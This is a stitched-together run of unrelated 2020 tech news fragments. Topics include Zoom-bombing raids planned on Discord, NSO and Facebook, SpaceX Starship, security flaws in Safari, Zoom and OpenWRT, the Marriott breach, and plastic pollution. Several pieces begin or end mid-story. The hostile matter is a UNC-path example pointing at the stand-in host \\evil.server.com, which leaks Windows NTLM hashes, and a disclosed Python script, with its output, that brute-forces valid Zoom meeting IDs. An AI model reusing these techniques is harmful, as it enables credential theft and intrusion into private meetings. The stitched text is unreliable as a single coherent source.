For those unaware, Zoom officially has a porn problem. The multibillion-dollar video messaging mainstay among employees at Johnson & Johnson and the Department of Homeland Security—not to mention a household name among currently house-bound citizens across the country—has been rocked by story after story of pranksters popping into video meetings with clips of graphic porn or Nazi memorabilia. None of Zoom’s clients, seemingly, are safe: These Zoom bombs have hit city council members and churches alike. They’ve hit Chipotle.
The idea of having our work-from-home happy hours disrupted by someone splicing in something porn-y or Hitler-y is disturbing, and that’s where it usually ends: annoyance, disgust, shock—which is ultimately the response that these posters are trying to incite. But a Gizmodo investigation into multiple Discord chatrooms dedicated to coordinating these attacks revealed that the practice has a far darker side that can leave victims scarred for life—or far worse.
Zoom-based “bombs” and “raids” are typically the forte of high and middle school students whose classes are now almost exclusively taking place on the platform. From last month onward, Zoom’s rolled out a series of changes specifically catering to the educators it has onboard, from lifting the 40-minute limit on free meetings internationally to partnering with Logitech to offer free cameras and headsets to teachers who might need them. This gesture of goodwill promptly blew up in the company’s face when these students quickly realized that the codes and passwords needed to access a given Zoom meeting could be freely shared, leading a select few to coordinate with other students nationwide to spearhead a wave of raids in classrooms across the country.
Screenshot: Gizmodo (Discord)
Teens, in general, have a thing for Discord, a popular chat platform, and Discord is where these raids are coordinated. The platform’s long track record of raids on every platform led it to wedge a statement into its community guidelines explicitly disavowing raids as a “form of harassment.” Now that those raids have hit Zoom, Discord’s been actively booting off some users that are particularly active in a given raid channel, while unceremoniously shutting those channels down left and right.
This crackdown, along with the shuttering of raid-based communities on Reddit like the creatively named r/zoomraids, means that a lot of these channels are hard to find, and that finding them isn’t a guarantee that it’ll exist the next day. Over the course of this story, Gizmodo joined about 15 raid channels—some racking up more than 800 members a pop. By the time you’re reading this, there are at most six left standing—and for the most part, they are hidden behind server names that don’t mention Zoom at all. Discord told Gizmodo in an email that it had removed more than 350 servers for Zoom bombing just this morning.
“This behavior violates Discord’s terms of service, and we strongly condemn it,” a spokesperson told Gizmodo in a statement. “Once we identify those servers engaging in this sort of activity, we quickly investigate and take action, including removing content, banning users and shutting down those servers.”
The bulk of these servers, overall, are made up of teens not only swapping Zoom links back and forth but overall just… being typical edgelord teens—joking about the Holocaust (ironically), using racial slurs (ironically), and sharing a ton of porn (ironically?). Less ironic, but just as dark, are the materials shared back and forth to make these campaigns a reality. Multiple channels that Gizmodo joined had created a roster of Google documents listing the Zoom codes of hundreds of support groups in the U.S., along with the days and times each one would meet. Similar documents were created to target meetings for other at-risk groups, like LGBTQ and trans teens.
The Wednesday meetings from the manifesto detailing nearly 200 meetings happening weekly nationwide. Zoom codes are censored.
Screenshot: Gizmodo (Discord)
Depending on who you ask, raids on recovery groups are either lame, funny, fucked, or some combination of the three. Each of the Discord channels had a list of rules seemingly tailored to throw admins off the scent of the channel’s true purpose. One server’s rulebook stated that its one goal was to “support our fellow students and adults through their hard day of work by surprising them in their online meetings.” Another server for raid planning included the rule, “DO NOT RAID I DO NOT CONDONE IT.”
In many of the channels, all Zoom calls are fair game, whether it’s a Narcotics Anonymous meeting or a kindergarten classroom. Rules aside, the only limit to what’s being shared is in the hands of the poster: Some think playing footage of the 2019 Christchurch Mosque shooting in the middle of an NA meeting is a bridge too far, while others don’t. Some think exposing 9- and 10-year-olds to hardcore porn is too shitty, while others think the line should be drawn at middle schoolers and above.
As one user put it, “this discord freakin showed porn to kindergardners but wont raid an narcotics [anonymous]? y’all soft.”
Screenshot: Gizmodo (Discord)
While Zoom’s yet to respond to our request for comment, the company is undoubtedly aware of its raiding problem. Late last month, it put out an official blog post about “keeping uninvited guests” out of Zoom meetings, which reminds users, “When you share your meeting link on social media or other public forums, that makes your event … extremely public. ANYONE with the link can join your meeting.”
Some of the channels Gizmodo joined did, indeed, set up scrapers and dedicated bots specifically to monitor a Zoom link shared on a given platform. But just as many used a much easier tool: Google search. As confirmed by Gizmodo, public-facing Zoom links share a specific string of characters that, when plugged into Google search (or “dorked,” in internet parlance), will turn up dozens of upcoming Zoom meetings. Trying the search term ourselves, we were able to pull links for Zooms dedicated to hot yoga, wine tasting, and legal advice—all in less than a minute—not to mention more than a few Zoom’s dedicated to parents and their kids.
Putting young children at risk of exposure to horrifying imagery comes up more frequently than you’d might think since Zoom’s teacher-friendly packages apply for preschool teachers as much as it does for college professors. And just like Zoom bombings aimed at high school classes, the reactions of these young children can be passed around in videos recorded by the bombers. In the barely 24 hours we spent joining more than a dozen channels, one video—which showed the confused reactions of second graders being exposed to graphic hardcore pornography in the middle of their class—was frequently shared.
For what should be obvious reasons, we didn’t join any of the many, many raids linked at any given time, so we can’t specify what other young children might be seeing. If we’re assuming the worst, then that means some kids on these video calls are being exposed to footage of decapitation or shootings from sites like Bestgore and LiveLeak, along with any porn scenario you can imagine. Assuming the best-case scenario, the porn’s still there, but the murders aren’t. In either case, kids are at risk: Psychologists have been telling us for years that exposing children to hardcore pornography bumps up the chance that they’ll both become either the victim of sexual assault or end up assaulting someone themselves. Children who see the types of horrific violence you’d find on any gore site can haunt them for the rest of their lives, leading to PTSD or drug abuse.
Screenshot: Gizmodo (Discord)
And when it comes to meetings involving drug abuse, the harm done by these kinds of bombings cannot be overstated. As one Business Insider employee—and Alcoholics Anonymous member—recently explained, the isolation that comes with coronavirus-mandated quarantines is incredibly dangerous for those struggling with addiction:
We are all in our separate homes. And that can be dangerous, because alcoholics are notorious for isolating, for withdrawing from social situations — sometimes with a bottle.
If you drink normally, you may be wondering, ‘Why not just drink — even if you have a problem? Right now, while locked down, who could that hurt?’ I can answer that. I drank myself into the emergency room years ago. I know many people who did. Do you think hospitals need that right now? Do you think healthcare workers need to deal with millions of people whose immune systems are severely compromised by binge drinking?
Screenshot: Gizmodo (Discord)
The risk of relapse doesn’t just come for alcoholics, but anyone with any addiction. As one recent Rolling Stone report detailed, these sorts of weekly meetings can turn into not only a place to discuss their road to recovery but also a place that feels safe to talk about their inarguably valid fears surrounding the current pandemic. When that support line is intercepted—by an edgy teen or otherwise—a recovering addict can lose that tenuous feeling of safety and withdraw from meetings with the support group keeping them clean.
Without that network, some folks fare well and others don’t, with relapse being a bigger risk to those earlier on in recovery, as the Business Insider report explains. For some addictions—like opioids, a relapse can turn deadly shockingly fast. As pointed out by the Centers for Disease Control in 2018, some 70 percent of the tens of thousands of annual drug overdoses in the U.S. happen because of opiate addiction.
Of course, people being dangerously shitty to each other is nothing new. Nor are online pranks. What makes Zoom bombing so wretched is that it’s happening at a time when millions of us are stuck inside with nowhere to go except, perhaps, into a video call with our friends and family, teachers, and support communities—our last tethers to the lives we used to have.
NSO Group – sued by Facebook for developing Pegasus spyware that targeted WhatsApp users – this week claimed Facebook tried to license the very same surveillance software to snoop on its own social-media addicts.
The Israeli spyware maker’s CEO Shalev Hulio alleged in a statement [PDF] to a US federal district court that in 2017 he was approached by Facebook reps who wanted to use NSO’s Pegasus technology in Facebook’s controversial Onavo Protect app to track mobile users.
Pegasus is designed to, once installed on a device, harvest its text messages, gather information about its apps, eavesdrop on calls, track its location, and harvest passwords, among other things.
Onavo Protect, acquired by Facebook in 2013, was available for Android and iOS. It used VPN tunneling to wrap users’ internet connections in encryption, shielding their information as it traveled over untrusted and insecure Wi-Fi networks and the like. The iOS version also blocked harmful websites. However, the software blabbed telemetry about its users to Facebook as well as routed connections through Onavo servers, which could monitor people’s online activities. The application was forced out of the Apple iOS store in 2018 for siphoning information about other programs installed on devices, and discontinued in May 2019.
According to the NSO chief exec, Onavo Protect needed more surveillance powers on iOS handhelds, and so Facebook turned to the spyware maker for its technology.
“The Facebook representatives stated that Facebook was concerned that its method for gathering user data through Onavo Protect was less effective on Apple devices than on Android devices,” Hulio alleged.
“The Facebook representatives also stated that Facebook wanted to use purported capabilities of Pegasus to monitor users on Apple devices and were willing to pay for the ability to monitor Onavo Protect users.”
Because NSO only sells to governments and not private companies, Hulio claimed, he turned down the Facebook licensing offer.
Facebook, in a statement to The Register, characterized the allegations as a distraction from its legal battle against NSO, which kicked off in October 2019. The web giant claims NSO, working on behalf of its customers, illegally hacked targets via security vulnerabilities in Facebook-owned WhatsApp’s code to install Pegasus on devices.
“NSO is trying to distract from the facts Facebook and WhatsApp filed in court nearly six months ago. Their attempt to avoid responsibility includes inaccurate representations about both their spyware and a discussion with people who work at Facebook,” a Facebook spokesperson said.
“Our lawsuit describes how NSO is responsible for attacking over 100 human rights activists and journalists around the world. NSO CEO Shalev Hulio has admitted his company can attack devices without a user knowing and he can see who has been targeted with Pegasus. We look forward to proving our case against NSO in court and seeking accountability for their actions.”
The case has been unusual from the start, with Facebook filing suit after first deleting NSO workers’ personal Facebook accounts. The spyware maker then missed its scheduled court appearance because, it was alleged, Facebook did not properly serve its paperwork.
NSO reckons Facebook’s accusations are baseless because it only sells its software to government departments and agencies, and does not operate the tools itself. Thus, we’re told, it didn’t hack anyone itself, and it cannot be held accountable for the actions of its customers. NSO also noted it only deals with governments allowed under Israeli export laws.
Further, NSO contended the court, in Oakland, California, does not have jurisdiction to hear this case due to America’s Foreign Sovereign Immunity Act, and it argued that the actions described in the lawsuit wouldn’t even run afoul of its spyware’s terms of service
This week, SpaceX workers in South Texas loaded the third full-scale Starship prototype—SN3—onto a test stand at the company’s Boca Chica launch site. On Wednesday night, they pressure-tested the vehicle at ambient temperature with nitrogen, and SN3 performed fine.
On Thursday night SpaceX began cryo-testing the vehicle, which means it was loaded again with nitrogen, but this time it was chilled to flight-like temperatures and put under flight-like pressures. Unfortunately, a little after 2am local time, SN3 failed and began to collapse on top of itself. It appeared as if the vehicle may have lost pressurization and become top-heavy.
Shortly after the failure, SpaceX’s founder and chief engineer, Elon Musk, said on Twitter, “We will see what data review says in the morning, but this may have been a test configuration mistake.” A testing issue would be good in the sense that it means the vehicle itself performed well, and the problem can be more easily addressed.
This is the third time a Starship has failed during these proof tests that precede engine tests and, potentially flight tests. Multiple sources indicated that had these preliminary tests succeeded, SN3 would have attempted a 150-meter flight test as early as next Tuesday.
Here’s a recap of SpaceX’s efforts to test full-size Starships to date:
Starship Mk1: Construction began in December, 2018. Failed during pressure test in November, 2019.
Starship SN1: Construction began in October, 2019. Failed during a pressure test on Feb. 28.
Starship SN2: Construction began in Feb., 2020. After SN1 failure, was converted into a test bed for thrust puck at base of rocket. Passed test on March 8, and was retired.
Starship SN3: Construction began in March, 2020. Cryogenic test failure on April 3.
Starship SN4: Construction began in March, 2020. Testing begins later this month?
This failure has to be a disappointment in that the prototype rocket failed for a third time before getting to Raptor engine tests. And after the SN1 failure, Musk said he told his engineers, “In the future, you treat that rocket like it’s your baby, and you do not send it to the test site unless you think your baby’s going to be OK.”
Apple patched the vulnerabilities in January and March updates. But before the fixes, all a victim would have needed to do is click one malicious link and an attacker would have been able to spy on them remotely.
“Safari encourages users to save their preferences for site permissions, like whether to trust Skype with microphone and camera access,” says Ryan Pickren, the security researcher who disclosed the vulnerabilities to Apple. “So what an attacker could do with this kill chain is make a malicious website that from Safari’s perspective could then turn into ‘Skype’. And then the malicious site will have all the permissions that you previously granted to Skype, which means an attacker could just start taking pictures of you or turn on your microphone or even screen-share.”
The bugs Pickren found all stem from seemingly minor oversights. For example, he discovered that Safari’s list of the permissions a user has granted to websites treated all sorts of URL variations as being part of the same site, like https://www.example.com, http://example.com, and fake://example.com. By “wiggling around,” as Pickren puts it, he was able to generate specially crafted URLs that could work with scripts embedded in a malicious site to launch the bait-and-switch that would trick Safari.
“I just kind of hammered the browser with really weird cases until Safari got confused and gave an origin that didn’t make sense,” he says. “And eventually the bugs could all kind of bounce from one to the next. Part of this is that some of the bugs were really, really old flaws in the WebKit core from years ago. They probably were not as dangerous as they are now just because the stars lined up on how an attacker would use them today.”
A hacker who tricked a victim into clicking their malicious link would be able to quietly launch the target’s webcam and microphone to capture video, take photos, or record audio. And the attack would work on iPhones, iPads, and Macs alike. None of the flaws are in Apple’s microphone and webcam protections themselves, or even in Safari’s defenses that keep malicious sites from accessing the sensors. Instead, the attack surmounts all of these barriers just by generating a convincing disguise.
Pickren submitted seven vulnerabilities to Apple’s bug bounty program in mid-December and says he got a response that the company had validated the bugs the next day. While an attacker would only exploit three of the bugs to take over webcams in the chain Pickren envisioned, he found other, related flaws along the way that he submitted as well. Pickren says that part of the reason he encountered so many extra bugs was that he was looking for an attack chain that would work on both iOS and macOS—and Safari is designed slightly differently for each.
A study by economists Sergio Correia, Stephan Luck and Emil Verner suggests that the best way to save your economy is to save your people. The authors looked at the economic impact of the Spanish influenza pandemic of 1918 on different U.S. cities. They concluded that the earlier, more forcefully and longer cities responded, the better their economic recovery.
A faculty affiliate from the Harvard Department of Economics writes in Bloomberg: [C]ities that implemented aggressive social distancing and shutdowns to contain the virus came out looking better. Implementing these policies eight days earlier, or maintaining them for 46 days longer were associated with 4% and 6% higher post-pandemic manufacturing employment, respectively. The gains for output were similar. Likewise, faster and longer-lasting distancing measures were associated with higher post-pandemic banking activity…
[T]his is at least consistent with the arguments my Bloomberg Opinion colleagues Noah Smith and Michael Strain have already put forward for why easing distancing measures too early would be potentiallydevastating for the economy… [I]t looks like the things we should be doing to save lives are also what we should be doing to save the economy.
Now that a large portion of the world is working from home to ride out the coronavirus pandemic, Zoom’s popularity has rocketed, but also has led to an increased focus on the company’s security practices and privacy promises. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.
Patrick Wardle, a former NSA hacker and now principal security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.
The two bugs, Wardle said, can be launched by a local attacker — that’s where someone has physical control of a vulnerable computer. Once exploited, the attacker can gain and maintain persistent access to the innards of a victim’s computer, allowing them to install malware or spyware.
Wardle’s first bug piggybacks off a previous finding. Zoom uses a “shady” technique — one that’s also used by Mac malware — to install the Mac app without user interaction. Wardle found that a local attacker with low-level user privileges can inject the Zoom installer with malicious code to obtain the highest level of user privileges, known as “root.”
Those root-level user privileges mean the attacker can access the underlying macOS operating system, which are typically off-limits to most users, making it easier to run malware or spyware without the user noticing.
The second bug exploits a flaw in how Zoom handles the webcam and microphone on Macs. Zoom, like any app that needs the webcam and microphone, first requires consent from the user. But Wardle said an attacker can inject malicious code into Zoom to trick it into giving the attacker the same access to the webcam and microphone that Zoom already has. Once Wardle tricked Zoom into loading his malicious code, the code will “automatically inherit” any or all of Zoom’s access rights, he said — and that includes Zoom’s access to the webcam and microphone.
“No additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video,” wrote Wardle.
Because Wardle dropped detail of the vulnerabilities on his blog, Zoom has not yet provided a fix. Zoom also did not respond to TechCrunch’s request for comment.
In the meanwhile, Wardle said, “if you care about your security and privacy, perhaps stop using Zoom.”
Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.
When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.
But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.
Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.
The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”
And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.
Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.
The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.
The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”
Four global drinks giants are responsible for more than half a million tonnes of plastic pollution in six developing countries each year, enough to cover 83 football pitches every day, according to a report.
The NGO Tearfund has calculated the greenhouse gas emissions from the open burning of plastic bottles, sachets and cartons produced by Coca-Cola, PepsiCo, Nestlé and Unilever in developing nations, where waste can be mismanaged because people do not have access to collections.
Taking a sample of six developing countries, reflecting a spread across the globe, the NGO estimated the burning of plastic packaging put on to the market by the companies creates 4.6m tonnes of carbon dioxide equivalent – equivalent to the emissions from 2m cars.
Tearfund analysed the plastic put on the market in China, India, the Philippines, Brazil, Mexico and Nigeria by the four companies to examine the impact of single use plastic in developing countries. The countries were chosen because they are large developing country markets, spread across three continents.
The sachets, bottles, and cartons sold in these countries often end up either being burned or dumped – creating a pollution problem equivalent to covering 83 football pitches with plastic to 10 centimetres deep each day.
The report says: “This massive plastic pollution footprint, while a crisis in and of itself, is also contributing to the climate crisis.”
It adds that the four companies make little or no mention of emissions from disposal of their products or packaging in their climate change commitments.
“These companies continue to sell billions of products in single-use bottles, sachets and packets in developing countries,” says the report.
“And they do this despite knowing that: waste isn’t properly managed in these contexts; their packaging therefore becomes pollution; and such pollution causes serious harm to the environment and people’s health. Such actions – with such knowledge – are morally indefensible.”
The charity is calling for the companies to urgently switch to refillable and reusable packaging instead of sachets and plastic bottles.
The NGO estimated how much of their plastic waste in each country is mismanaged, burned or dumped using World Bank data.
Apple’s latest update to macOS Catalina appears to have broken SSH for some users.
Developer Tyler Hall published a blog post on Monday detailing the issue, but removed it after his writeup got noticed.
The issue is that under Apple’s macOS 10.15.4 update, released on March 24, trying to open a SSH connection to a port greater than 8192 using a server name, rather than an IP address, no longer works – for some users at least. SSH is a Swiss army knife that can be used to securely connect to remote machines to run commands, transfer files and other data, and so on.
The Register asked Hall to elaborate on his findings but he declined, citing the possibility that the problem might be particular to his set up rather than a bug in the software Apple shipped.
Hall demonstrated similar post-publication remorse this last October when he criticized the code quality of macOS Catalina, comparing it to Windows Vista. That sentiment is shared among many other macOS users (eg: “macOS 10.15 is chockablock with paper-cut bugs” – John Gruber). But the responses Hall received from friends within Apple led him to regret that post, too.
We asked Apple to comment but we’ve received no reply. Cupertino seldom addresses public criticism. Until June 2016, Apple even implied in its App Store Review Guidelines that it would look unfavorably on developers who complain publicly about rejected apps. Up to that point, its policy said, “If you run to the press and trash us, it never helps.”
The US government’s renewed antitrust scrutiny of companies like Amazon, Apple, Facebook, and Google in recent years has perhaps encouraged more caution in publicly declared tech platform policies.
The issue that Hall reported has been noted by others. A post two days ago on Apple’s discussion forum complains, “After that update I am no longer able to open a SSH connection to a port greater than 8192 using server name (instead of IP).” And three discussion participants claim they too have experienced the same issue.
One of these individuals, posting under the user name “webdeck,” filed a bug port in Open Radar, a public iOS and macOS bug reporting site created by developer Tim Burks because Apple hides its Radar bug reporting system from the public.
The bug report reads, “/usr/bin/ssh in macos 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macOS 10.15.3.”
For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.
OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.
Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTPs connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWTR maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.
Exploits not for everyone
These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.
It seemed like a bit of a risk when Mazda decided to not offer a touchscreen in the new Mazda 3. But Mazda may have just been ahead of the trend, as Honda has also abandoned some reliance on the new Honda Jazz’s touch controls because they just aren’t “intuitive.”
Despite nearly a decade of dominating conversations about automotive design and not, for some reason, the risks of distracted driving, touchscreens are finally being seen for what they really are: annoying.
Jazz project leader Takeki Tanaka explained: “The reason is quite simple – we wanted to minimise driver disruption for operation, in particular, for the heater and air conditioning.
“We changed it from touchscreen to dial operation, as we received customer feedback that it was difficult to operate intuitively. You had to look at the screen to change the heater seating, therefore, we changed it so one can operate it without looking, giving more confidence while driving.”
And here’s the part where anyone who has reviewed a car in the last decade goes and screams into their pillow with frustration, because that’s exactly the sort of feedback automakers have been getting from focus groups, customers and reviewers for about as long as these touchscreen systems have been in cars.
Touchscreens are worse than touch controls for one very obvious reason: A touchscreen requires two human senses—touch, obviously, and sight. But with enough experience, the genius of the human brain is capable of motor memory, so touch dials and buttons will eventually only require the memory of where it’s located and a finger to touch it. Eyes can stay on the road.
The problem is people want cool technology in their cars. They want to feel like their hard-earned loan is going toward something nice and fancy and smarter than them. This is why some people like the Tesla tablet—they think its efficient to put literally thousands of functions all in one very distracting toy. That’s not very safe. It’s safer to put the toys away and just turn a knob to be more comfortable.
Simplicity is the greatest efficiency, and I’m pretty jazzed for a touchscreen-less future. It’s like music to my ears.
Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.
Future offers will be available through Ubisoft’s Free Events site.
There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.
Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.
The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”
“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.
“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.
Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.
Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.
The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.
Popular video-conferencing Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.
The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.
“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.
Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.
“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.
A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard
On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”
Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.
On Twitter Motherboard found other instances of Dutch users reporting the same issue.
“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.
Do you know anything about data selling or trading? We’d love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on jfcox@jabber.ccc.de, or email joseph.cox@vice.com.
Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.
“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.
In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.
All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.
The Problem
If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual participants admission, these 9-10-11 digits were the only thing that secured your meeting i.e. prevented an unauthorized person from connecting to it.
Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:
urls = []
for _ in range(1000):
urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))
But how could we determine if a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this based on the following “div” element present in the HTML Body of the returned response, when accessing “Join Meeting” URL (https://zoom.us/j/{MEETING_ID})
I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):
for url in urls:yieldMakeHTTPRequest(url=url, callback=parseResponse)defMakeHTTPRequest(url, callback)…def parseResponse(response):if response.css('div#join-errormsg').get()isNone:print('Valid Meeting ID found: {}'.format(response.url))else:print('Invalid Meeting ID')
…and look at the output:
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID
Bingo!
Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success, comparing to the pure brute force.
Mitigation
We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs
2. Replace the randomization function with a cryptographically strong one.
3.Increase the number of digits\symbols in the Meeting IDs.
4.Force hosts to use passwords\PINs\SSO for authorization purposes.
Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client\infrastructure following our disclosure:
Passwords are added by default to all future scheduled meetings.
Password settings are enforceable at the account level and group level by the account admin.
Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.
The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.
Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.
Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.
On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.
A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.
